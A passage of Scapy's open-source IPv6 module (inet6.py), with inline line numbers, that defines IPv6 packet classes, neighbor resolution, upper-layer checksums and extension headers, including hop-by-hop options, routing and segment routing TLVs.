1############################################################################# 2# # 3# inet6.py --- IPv6 support for Scapy # 4# see http://natisbad.org/IPv6/ # 5# for more information # 6# # 7# Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> # 8# Arnaud Ebalard <arnaud.ebalard@eads.net> # 9# # 10# This program is free software; you can redistribute it and/or modify it # 11# under the terms of the GNU General Public License version 2 as # 12# published by the Free Software Foundation. # 13# # 14# This program is distributed in the hope that it will be useful, but # 15# WITHOUT ANY WARRANTY; without even the implied warranty of # 16# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # 17# General Public License for more details. # 18# # 19############################################################################# 20 21""" 22IPv6 (Internet Protocol v6). 23""" 24 25 26from __future__ import absolute_import 27from __future__ import print_function 28 29from hashlib import md5 30import random 31import socket 32import struct 33from time import gmtime, strftime 34 35from scapy.arch import get_if_hwaddr 36from scapy.as_resolvers import AS_resolver_riswhois 37from scapy.base_classes import Gen 38from scapy.compat import chb, orb, raw, plain_str, bytes_encode 39from scapy.config import conf 40from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ 41 MTU 42from scapy.error import log_runtime, warning 43from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ 44 DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ 45 LongField, MACField, PacketLenField, PacketListField, ShortEnumField, \ 46 ShortField, SourceIP6Field, StrField, StrFixedLenField, StrLenField, \ 47 X3BytesField, XBitField, XIntField, XShortField 48from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ 49 UDP, UDPerror 50from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP 51import scapy.modules.six as six 52from scapy.packet import bind_layers, Packet, Raw 53from scapy.sendrecv import sendp, sniff, sr, srp1 54from scapy.supersocket import SuperSocket, L3RawSocket 55from scapy.utils import checksum, strxor 56from scapy.pton_ntop import inet_pton, inet_ntop 57from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 58 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 59 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 60from scapy.volatile import RandInt, RandShort 61 62if not socket.has_ipv6: 63 raise socket.error("can't use AF_INET6, IPv6 is disabled") 64if not hasattr(socket, "IPPROTO_IPV6"): 65 # Workaround for http://bugs.python.org/issue6926 66 socket.IPPROTO_IPV6 = 41 67if not hasattr(socket, "IPPROTO_IPIP"): 68 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 69 socket.IPPROTO_IPIP = 4 70 71if conf.route6 is None: 72 # unused import, only to initialize conf.route6 73 import scapy.route6 # noqa: F401 74 75########################## 76# Neighbor cache stuff # 77########################## 78 79conf.netcache.new_cache("in6_neighbor", 120) 80 81 82@conf.commands.register 83def neighsol(addr, src, iface, timeout=1, chainCC=0): 84 """Sends and receive an ICMPv6 Neighbor Solicitation message 85 86 This function sends an ICMPv6 Neighbor Solicitation message 87 to get the MAC address of the neighbor with specified IPv6 address address. 88 89 'src' address is used as source of the message. Message is sent on iface. 90 By default, timeout waiting for an answer is 1 second. 91 92 If no answer is gathered, None is returned. Else, the answer is 93 returned (ethernet frame). 94 """ 95 96 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 97 d = inet_ntop(socket.AF_INET6, nsma) 98 dm = in6_getnsmac(nsma) 99 p = Ether(dst=dm) / IPv6(dst=d, src=src, hlim=255) 100 p /= ICMPv6ND_NS(tgt=addr) 101 p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) 102 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, 103 chainCC=chainCC) 104 105 return res 106 107 108@conf.commands.register 109def getmacbyip6(ip6, chainCC=0): 110 """Returns the MAC address corresponding to an IPv6 address 111 112 neighborCache.get() method is used on instantiated neighbor cache. 113 Resolution mechanism is described in associated doc string. 114 115 (chainCC parameter value ends up being passed to sending function 116 used to perform the resolution, if needed) 117 """ 118 119 if isinstance(ip6, Net6): 120 ip6 = str(ip6) 121 122 if in6_ismaddr(ip6): # Multicast 123 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 124 return mac 125 126 iff, a, nh = conf.route6.route(ip6) 127 128 if iff == conf.loopback_name: 129 return "ff:ff:ff:ff:ff:ff" 130 131 if nh != '::': 132 ip6 = nh # Found next hop 133 134 mac = conf.netcache.in6_neighbor.get(ip6) 135 if mac: 136 return mac 137 138 res = neighsol(ip6, a, iff, chainCC=chainCC) 139 140 if res is not None: 141 if ICMPv6NDOptDstLLAddr in res: 142 mac = res[ICMPv6NDOptDstLLAddr].lladdr 143 else: 144 mac = res.src 145 conf.netcache.in6_neighbor[ip6] = mac 146 return mac 147 148 return None 149 150 151############################################################################# 152############################################################################# 153# IPv6 Class # 154############################################################################# 155############################################################################# 156 157ipv6nh = {0: "Hop-by-Hop Option Header", 158 4: "IP", 159 6: "TCP", 160 17: "UDP", 161 41: "IPv6", 162 43: "Routing Header", 163 44: "Fragment Header", 164 47: "GRE", 165 50: "ESP Header", 166 51: "AH Header", 167 58: "ICMPv6", 168 59: "No Next Header", 169 60: "Destination Option Header", 170 112: "VRRP", 171 132: "SCTP", 172 135: "Mobility Header"} 173 174ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 175 4: "IP", 176 6: "TCP", 177 17: "UDP", 178 43: "IPv6ExtHdrRouting", 179 44: "IPv6ExtHdrFragment", 180 50: "ESP", 181 51: "AH", 182 58: "ICMPv6Unknown", 183 59: "Raw", 184 60: "IPv6ExtHdrDestOpt"} 185 186 187class IP6ListField(StrField): 188 __slots__ = ["count_from", "length_from"] 189 islist = 1 190 191 def __init__(self, name, default, count_from=None, length_from=None): 192 if default is None: 193 default = [] 194 StrField.__init__(self, name, default) 195 self.count_from = count_from 196 self.length_from = length_from 197 198 def i2len(self, pkt, i): 199 return 16 * len(i) 200 201 def i2count(self, pkt, i): 202 if isinstance(i, list): 203 return len(i) 204 return 0 205 206 def getfield(self, pkt, s): 207 c = tmp_len = None 208 if self.length_from is not None: 209 tmp_len = self.length_from(pkt) 210 elif self.count_from is not None: 211 c = self.count_from(pkt) 212 213 lst = [] 214 ret = b"" 215 remain = s 216 if tmp_len is not None: 217 remain, ret = s[:tmp_len], s[tmp_len:] 218 while remain: 219 if c is not None: 220 if c <= 0: 221 break 222 c -= 1 223 addr = inet_ntop(socket.AF_INET6, remain[:16]) 224 lst.append(addr) 225 remain = remain[16:] 226 return remain + ret, lst 227 228 def i2m(self, pkt, x): 229 s = b"" 230 for y in x: 231 try: 232 y = inet_pton(socket.AF_INET6, y) 233 except Exception: 234 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 235 y = inet_pton(socket.AF_INET6, y) 236 s += y 237 return s 238 239 def i2repr(self, pkt, x): 240 s = [] 241 if x is None: 242 return "[]" 243 for y in x: 244 s.append('%s' % y) 245 return "[ %s ]" % (", ".join(s)) 246 247 248class _IPv6GuessPayload: 249 name = "Dummy class that implements guess_payload_class() for IPv6" 250 251 def default_payload_class(self, p): 252 if self.nh == 58: # ICMPv6 253 t = orb(p[0]) 254 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 255 return _niquery_guesser(p) 256 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 257 if t == 130 and len(p) >= 28: 258 # RFC 3810 - 8.1. Query Version Distinctions 259 return ICMPv6MLQuery2 260 return icmp6typescls.get(t, Raw) 261 return Raw 262 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 263 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 264 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 265 return IPv6ExtHdrSegmentRouting 266 return ipv6nhcls.get(self.nh, Raw) 267 268 269class IPv6(_IPv6GuessPayload, Packet, IPTools): 270 name = "IPv6" 271 fields_desc = [BitField("version", 6, 4), 272 BitField("tc", 0, 8), 273 BitField("fl", 0, 20), 274 ShortField("plen", None), 275 ByteEnumField("nh", 59, ipv6nh), 276 ByteField("hlim", 64), 277 SourceIP6Field("src", "dst"), # dst is for src @ selection 278 DestIP6Field("dst", "::1")] 279 280 def route(self): 281 """Used to select the L2 address""" 282 dst = self.dst 283 if isinstance(dst, Gen): 284 dst = next(iter(dst)) 285 return conf.route6.route(dst) 286 287 def mysummary(self): 288 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 289 290 def post_build(self, p, pay): 291 p += pay 292 if self.plen is None: 293 tmp_len = len(p) - 40 294 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] 295 return p 296 297 def extract_padding(self, data): 298 """Extract the IPv6 payload""" 299 300 if self.plen == 0 and self.nh == 0 and len(data) >= 8: 301 # Extract Hop-by-Hop extension length 302 hbh_len = orb(data[1]) 303 hbh_len = 8 + hbh_len * 8 304 305 # Extract length from the Jumbogram option 306 # Note: the following algorithm take advantage of the Jumbo option 307 # mandatory alignment (4n + 2, RFC2675 Section 2) 308 jumbo_len = None 309 idx = 0 310 offset = 4 * idx + 2 311 while offset <= len(data): 312 opt_type = orb(data[offset]) 313 if opt_type == 0xc2: # Jumbo option 314 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 315 break 316 offset = 4 * idx + 2 317 idx += 1 318 319 if jumbo_len is None: 320 log_runtime.info("Scapy did not find a Jumbo option") 321 jumbo_len = 0 322 323 tmp_len = hbh_len + jumbo_len 324 else: 325 tmp_len = self.plen 326 327 return data[:tmp_len], data[tmp_len:] 328 329 def hashret(self): 330 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 331 if self.payload.type < 128: 332 return self.payload.payload.hashret() 333 elif (self.payload.type in [133, 134, 135, 136, 144, 145]): 334 return struct.pack("B", self.nh) + self.payload.hashret() 335 336 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 337 return self.payload.hashret() 338 339 nh = self.nh 340 sd = self.dst 341 ss = self.src 342 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 343 # With routing header, the destination is the last 344 # address of the IPv6 list if segleft > 0 345 nh = self.payload.nh 346 try: 347 sd = self.addresses[-1] 348 except IndexError: 349 sd = '::1' 350 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 351 # could be anything from the original list ... 352 if 1: 353 sd = inet_pton(socket.AF_INET6, sd) 354 for a in self.addresses: 355 a = inet_pton(socket.AF_INET6, a) 356 sd = strxor(sd, a) 357 sd = inet_ntop(socket.AF_INET6, sd) 358 359 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 360 # With segment routing header (rh == 4), the destination is 361 # the first address of the IPv6 addresses list 362 try: 363 sd = self.addresses[0] 364 except IndexError: 365 sd = self.dst 366 367 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 368 nh = self.payload.nh 369 370 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 371 nh = self.payload.nh 372 373 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 374 foundhao = None 375 for o in self.payload.options: 376 if isinstance(o, HAO): 377 foundhao = o 378 if foundhao: 379 nh = self.payload.nh # XXX what if another extension follows ? 380 ss = foundhao.hoa 381 382 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 383 sd = inet_pton(socket.AF_INET6, sd) 384 ss = inet_pton(socket.AF_INET6, ss) 385 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 386 else: 387 return struct.pack("B", nh) + self.payload.hashret() 388 389 def answers(self, other): 390 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 391 if self.nh in [4, 41]: 392 return self.payload.answers(other) 393 if isinstance(other, IPv6) and other.nh in [4, 41]: 394 return self.answers(other.payload) 395 if isinstance(other, IP) and other.proto in [4, 41]: 396 return self.answers(other.payload) 397 if not isinstance(other, IPv6): # self is reply, other is request 398 return False 399 if conf.checkIPaddr: 400 # ss = inet_pton(socket.AF_INET6, self.src) 401 sd = inet_pton(socket.AF_INET6, self.dst) 402 os = inet_pton(socket.AF_INET6, other.src) 403 od = inet_pton(socket.AF_INET6, other.dst) 404 # request was sent to a multicast address (other.dst) 405 # Check reply destination addr matches request source addr (i.e 406 # sd == os) except when reply is multicasted too 407 # XXX test mcast scope matching ? 408 if in6_ismaddr(other.dst): 409 if in6_ismaddr(self.dst): 410 if ((od == sd) or 411 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 412 return self.payload.answers(other.payload) 413 return False 414 if (os == sd): 415 return self.payload.answers(other.payload) 416 return False 417 elif (sd != os): # or ss != od): <- removed for ICMP errors 418 return False 419 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 420 # ICMPv6 Error message -> generated by IPv6 packet 421 # Note : at the moment, we jump the ICMPv6 specific class 422 # to call answers() method of erroneous packet (over 423 # initial packet). There can be cases where an ICMPv6 error 424 # class could implement a specific answers method that perform 425 # a specific task. Currently, don't see any use ... 426 return self.payload.payload.answers(other) 427 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 428 return self.payload.answers(other.payload) 429 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 430 return self.payload.answers(other.payload.payload) 431 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 432 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 433 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 434 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 435 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 436 return self.payload.payload.answers(other.payload.payload) 437 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 438 return self.payload.payload.answers(other.payload) 439 else: 440 if (self.nh != other.nh): 441 return False 442 return self.payload.answers(other.payload) 443 444 445class IPv46(IP): 446 """ 447 This class implements a dispatcher that is used to detect the IP version 448 while parsing Raw IP pcap files. 449 """ 450 @classmethod 451 def dispatch_hook(cls, _pkt=None, *_, **kargs): 452 if _pkt: 453 if orb(_pkt[0]) >> 4 == 6: 454 return IPv6 455 elif kargs.get("version") == 6: 456 return IPv6 457 return IP 458 459 460def inet6_register_l3(l2, l3): 461 return getmacbyip6(l3.dst) 462 463 464conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 465 466 467class IPerror6(IPv6): 468 name = "IPv6 in ICMPv6" 469 470 def answers(self, other): 471 if not isinstance(other, IPv6): 472 return False 473 sd = inet_pton(socket.AF_INET6, self.dst) 474 ss = inet_pton(socket.AF_INET6, self.src) 475 od = inet_pton(socket.AF_INET6, other.dst) 476 os = inet_pton(socket.AF_INET6, other.src) 477 478 # Make sure that the ICMPv6 error is related to the packet scapy sent 479 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 480 481 # find upper layer for self (possible citation) 482 selfup = self.payload 483 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 484 selfup = selfup.payload 485 486 # find upper layer for other (initial packet). Also look for RH 487 otherup = other.payload 488 request_has_rh = False 489 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 490 if isinstance(otherup, IPv6ExtHdrRouting): 491 request_has_rh = True 492 otherup = otherup.payload 493 494 if ((ss == os and sd == od) or # < Basic case 495 (ss == os and request_has_rh)): 496 # ^ Request has a RH : don't check dst address 497 498 # Let's deal with possible MSS Clamping 499 if (isinstance(selfup, TCP) and 500 isinstance(otherup, TCP) and 501 selfup.options != otherup.options): # seems clamped 502 503 # Save fields modified by MSS clamping 504 old_otherup_opts = otherup.options 505 old_otherup_cksum = otherup.chksum 506 old_otherup_dataofs = otherup.dataofs 507 old_selfup_opts = selfup.options 508 old_selfup_cksum = selfup.chksum 509 old_selfup_dataofs = selfup.dataofs 510 511 # Nullify them 512 otherup.options = [] 513 otherup.chksum = 0 514 otherup.dataofs = 0 515 selfup.options = [] 516 selfup.chksum = 0 517 selfup.dataofs = 0 518 519 # Test it and save result 520 s1 = raw(selfup) 521 s2 = raw(otherup) 522 tmp_len = min(len(s1), len(s2)) 523 res = s1[:tmp_len] == s2[:tmp_len] 524 525 # recall saved values 526 otherup.options = old_otherup_opts 527 otherup.chksum = old_otherup_cksum 528 otherup.dataofs = old_otherup_dataofs 529 selfup.options = old_selfup_opts 530 selfup.chksum = old_selfup_cksum 531 selfup.dataofs = old_selfup_dataofs 532 533 return res 534 535 s1 = raw(selfup) 536 s2 = raw(otherup) 537 tmp_len = min(len(s1), len(s2)) 538 return s1[:tmp_len] == s2[:tmp_len] 539 540 return False 541 542 def mysummary(self): 543 return Packet.mysummary(self) 544 545 546############################################################################# 547############################################################################# 548# Upper Layer Checksum computation # 549############################################################################# 550############################################################################# 551 552class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation 553 name = "Pseudo IPv6 Header" 554 fields_desc = [IP6Field("src", "::"), 555 IP6Field("dst", "::"), 556 ShortField("uplen", None), 557 BitField("zero", 0, 24), 558 ByteField("nh", 0)] 559 560 561def in6_chksum(nh, u, p): 562 """ 563 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums 564 565 Performs IPv6 Upper Layer checksum computation. 566 567 This function operates by filling a pseudo header class instance 568 (PseudoIPv6) with: 569 - Next Header value 570 - the address of _final_ destination (if some Routing Header with non 571 segleft field is present in underlayer classes, last address is used.) 572 - the address of _real_ source (basically the source address of an 573 IPv6 class instance available in the underlayer or the source address 574 in HAO option if some Destination Option header found in underlayer 575 includes this option). 576 - the length is the length of provided payload string ('p') 577 578 :param nh: value of upper layer protocol 579 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 580 provided with all under layers (IPv6 and all extension headers, 581 for example) 582 :param p: the payload of the upper layer provided as a string 583 """ 584 585 ph6 = PseudoIPv6() 586 ph6.nh = nh 587 rthdr = 0 588 hahdr = 0 589 final_dest_addr_found = 0 590 while u is not None and not isinstance(u, IPv6): 591 if (isinstance(u, IPv6ExtHdrRouting) and 592 u.segleft != 0 and len(u.addresses) != 0 and 593 final_dest_addr_found == 0): 594 rthdr = u.addresses[-1] 595 final_dest_addr_found = 1 596 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and 597 u.segleft != 0 and len(u.addresses) != 0 and 598 final_dest_addr_found == 0): 599 rthdr = u.addresses[0] 600 final_dest_addr_found = 1 601 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and 602 isinstance(u.options[0], HAO)): 603 hahdr = u.options[0].hoa 604 u = u.underlayer 605 if u is None: 606 warning("No IPv6 underlayer to compute checksum. Leaving null.") 607 return 0 608 if hahdr: 609 ph6.src = hahdr 610 else: 611 ph6.src = u.src 612 if rthdr: 613 ph6.dst = rthdr 614 else: 615 ph6.dst = u.dst 616 ph6.uplen = len(p) 617 ph6s = raw(ph6) 618 return checksum(ph6s + p) 619 620 621############################################################################# 622############################################################################# 623# Extension Headers # 624############################################################################# 625############################################################################# 626 627 628# Inherited by all extension header classes 629class _IPv6ExtHdr(_IPv6GuessPayload, Packet): 630 name = 'Abstract IPv6 Option Header' 631 aliastypes = [IPv6, IPerror6] # TODO ... 632 633 634# IPv6 options for Extension Headers # 635 636_hbhopts = {0x00: "Pad1", 637 0x01: "PadN", 638 0x04: "Tunnel Encapsulation Limit", 639 0x05: "Router Alert", 640 0x06: "Quick-Start", 641 0xc2: "Jumbo Payload", 642 0xc9: "Home Address Option"} 643 644 645class _OTypeField(ByteEnumField): 646 """ 647 Modified BytEnumField that displays information regarding the IPv6 option 648 based on its option type value (What should be done by nodes that process 649 the option if they do not understand it ...) 650 651 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 652 """ 653 pol = {0x00: "00: skip", 654 0x40: "01: discard", 655 0x80: "10: discard+ICMP", 656 0xC0: "11: discard+ICMP not mcast"} 657 658 enroutechange = {0x00: "0: Don't change en-route", 659 0x20: "1: May change en-route"} 660 661 def i2repr(self, pkt, x): 662 s = self.i2s.get(x, repr(x)) 663 polstr = self.pol[(x & 0xC0)] 664 enroutechangestr = self.enroutechange[(x & 0x20)] 665 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 666 667 668class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 669 name = "Scapy6 Unknown Option" 670 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 671 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 672 StrLenField("optdata", "", 673 length_from=lambda pkt: pkt.optlen)] 674 675 def alignment_delta(self, curpos): # By default, no alignment requirement 676 """ 677 As specified in section 4.2 of RFC 2460, every options has 678 an alignment requirement usually expressed xn+y, meaning 679 the Option Type must appear at an integer multiple of x octets 680 from the start of the header, plus y octets. 681 682 That function is provided the current position from the 683 start of the header and returns required padding length. 684 """ 685 return 0 686 687 @classmethod 688 def dispatch_hook(cls, _pkt=None, *args, **kargs): 689 if _pkt: 690 o = orb(_pkt[0]) # Option type 691 if o in _hbhoptcls: 692 return _hbhoptcls[o] 693 return cls 694 695 def extract_padding(self, p): 696 return b"", p 697 698 699class Pad1(Packet): # IPv6 Hop-By-Hop Option 700 name = "Pad1" 701 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] 702 703 def alignment_delta(self, curpos): # No alignment requirement 704 return 0 705 706 def extract_padding(self, p): 707 return b"", p 708 709 710class PadN(Packet): # IPv6 Hop-By-Hop Option 711 name = "PadN" 712 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 713 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 714 StrLenField("optdata", "", 715 length_from=lambda pkt: pkt.optlen)] 716 717 def alignment_delta(self, curpos): # No alignment requirement 718 return 0 719 720 def extract_padding(self, p): 721 return b"", p 722 723 724class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 725 name = "Router Alert" 726 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 727 ByteField("optlen", 2), 728 ShortEnumField("value", None, 729 {0: "Datagram contains a MLD message", 730 1: "Datagram contains RSVP message", 731 2: "Datagram contains an Active Network message", # noqa: E501 732 68: "NSIS NATFW NSLP", 733 69: "MPLS OAM", 734 65535: "Reserved"})] 735 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 736 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 737 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 738 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml 739 740 def alignment_delta(self, curpos): # alignment requirement : 2n+0 741 x = 2 742 y = 0 743 delta = x * ((curpos - y + x - 1) // x) + y - curpos 744 return delta 745 746 def extract_padding(self, p): 747 return b"", p 748 749 750class Jumbo(Packet): # IPv6 Hop-By-Hop Option 751 name = "Jumbo Payload" 752 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), 753 ByteField("optlen", 4), 754 IntField("jumboplen", None)] 755 756 def alignment_delta(self, curpos): # alignment requirement : 4n+2 757 x = 4 758 y = 2 759 delta = x * ((curpos - y + x - 1) // x) + y - curpos 760 return delta 761 762 def extract_padding(self, p): 763 return b"", p 764 765 766class HAO(Packet): # IPv6 Destination Options Header Option 767 name = "Home Address Option" 768 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), 769 ByteField("optlen", 16), 770 IP6Field("hoa", "::")] 771 772 def alignment_delta(self, curpos): # alignment requirement : 8n+6 773 x = 8 774 y = 6 775 delta = x * ((curpos - y + x - 1) // x) + y - curpos 776 return delta 777 778 def extract_padding(self, p): 779 return b"", p 780 781 782_hbhoptcls = {0x00: Pad1, 783 0x01: PadN, 784 0x05: RouterAlert, 785 0xC2: Jumbo, 786 0xC9: HAO} 787 788 789# Hop-by-Hop Extension Header # 790 791class _OptionsField(PacketListField): 792 __slots__ = ["curpos"] 793 794 def __init__(self, name, default, cls, curpos, *args, **kargs): 795 self.curpos = curpos 796 PacketListField.__init__(self, name, default, cls, *args, **kargs) 797 798 def i2len(self, pkt, i): 799 return len(self.i2m(pkt, i)) 800 801 def i2m(self, pkt, x): 802 autopad = None 803 try: 804 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 805 except Exception: 806 autopad = 1 807 808 if not autopad: 809 return b"".join(map(str, x)) 810 811 curpos = self.curpos 812 s = b"" 813 for p in x: 814 d = p.alignment_delta(curpos) 815 curpos += d 816 if d == 1: 817 s += raw(Pad1()) 818 elif d != 0: 819 s += raw(PadN(optdata=b'\x00' * (d - 2))) 820 pstr = raw(p) 821 curpos += len(pstr) 822 s += pstr 823 824 # Let's make the class including our option field 825 # a multiple of 8 octets long 826 d = curpos % 8 827 if d == 0: 828 return s 829 d = 8 - d 830 if d == 1: 831 s += raw(Pad1()) 832 elif d != 0: 833 s += raw(PadN(optdata=b'\x00' * (d - 2))) 834 835 return s 836 837 def addfield(self, pkt, s, val): 838 return s + self.i2m(pkt, val) 839 840 841class _PhantomAutoPadField(ByteField): 842 def addfield(self, pkt, s, val): 843 return s 844 845 def getfield(self, pkt, s): 846 return s, 1 847 848 def i2repr(self, pkt, x): 849 if x: 850 return "On" 851 return "Off" 852 853 854class IPv6ExtHdrHopByHop(_IPv6ExtHdr): 855 name = "IPv6 Extension Header - Hop-by-Hop Options Header" 856 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 857 FieldLenField("len", None, length_of="options", fmt="B", 858 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 859 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 860 _OptionsField("options", [], HBHOptUnknown, 2, 861 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 862 overload_fields = {IPv6: {"nh": 0}} 863 864 865# Destination Option Header # 866 867class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 868 name = "IPv6 Extension Header - Destination Options Header" 869 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 870 FieldLenField("len", None, length_of="options", fmt="B", 871 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 872 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 873 _OptionsField("options", [], HBHOptUnknown, 2, 874 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 875 overload_fields = {IPv6: {"nh": 60}} 876 877 878# Routing Header # 879 880class IPv6ExtHdrRouting(_IPv6ExtHdr): 881 name = "IPv6 Option Header Routing" 882 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 883 FieldLenField("len", None, count_of="addresses", fmt="B", 884 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 885 ByteField("type", 0), 886 ByteField("segleft", None), 887 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 888 IP6ListField("addresses", [], 889 length_from=lambda pkt: 8 * pkt.len)] 890 overload_fields = {IPv6: {"nh": 43}} 891 892 def post_build(self, pkt, pay): 893 if self.segleft is None: 894 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] 895 return _IPv6ExtHdr.post_build(self, pkt, pay) 896 897 898# Segment Routing Header # 899 900# This implementation is based on RFC8754, but some older snippets come from: 901# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 902 903_segment_routing_header_tlvs = { 904 # RFC 8754 sect 8.2 905 0: "Pad1 TLV", 906 1: "Ingress Node TLV", # draft 06 907 2: "Egress Node TLV", # draft 06 908 4: "PadN TLV", 909 5: "HMAC TLV", 910} 911 912 913class IPv6ExtHdrSegmentRoutingTLV(Packet): 914 name = "IPv6 Option Header Segment Routing - Generic TLV" 915 # RFC 8754 sect 2.1 916 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), 917 ByteField("len", 0), 918 StrLenField("value", "", length_from=lambda pkt: pkt.len)] 919 920 def extract_padding(self, p): 921 return b"", p 922 923 registered_sr_tlv = {} 924 925 @classmethod 926 def register_variant(cls): 927 cls.registered_sr_tlv[cls.type.default] = cls 928 929 @classmethod 930 def dispatch_hook(cls, pkt=None, *args, **kargs): 931 if pkt: 932 tmp_type = ord(pkt[:1]) 933 return cls.registered_sr_tlv.get(tmp_type, cls) 934 return cls 935 936 937class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 938 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 939 # draft-ietf-6man-segment-routing-header-06 3.1.1 940 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), 941 ByteField("len", 18), 942 ByteField("reserved", 0), 943 ByteField("flags", 0), 944 IP6Field("ingress_node", "::1")] 945 946 947class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 948 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 949 # draft-ietf-6man-segment-routing-header-06 3.1.2 950 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), 951 ByteField("len", 18), 952 ByteField("reserved", 0), 953 ByteField("flags", 0), 954 IP6Field("egress_node", "::1")] 955 956 957class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): 958 name = "IPv6 Option Header Segment Routing - Pad1 TLV" 959 # RFC8754 sect 2.1.1.1 960 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs), 961 FieldLenField("len", None, length_of="padding", fmt="B"), 962 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 963 964 965class 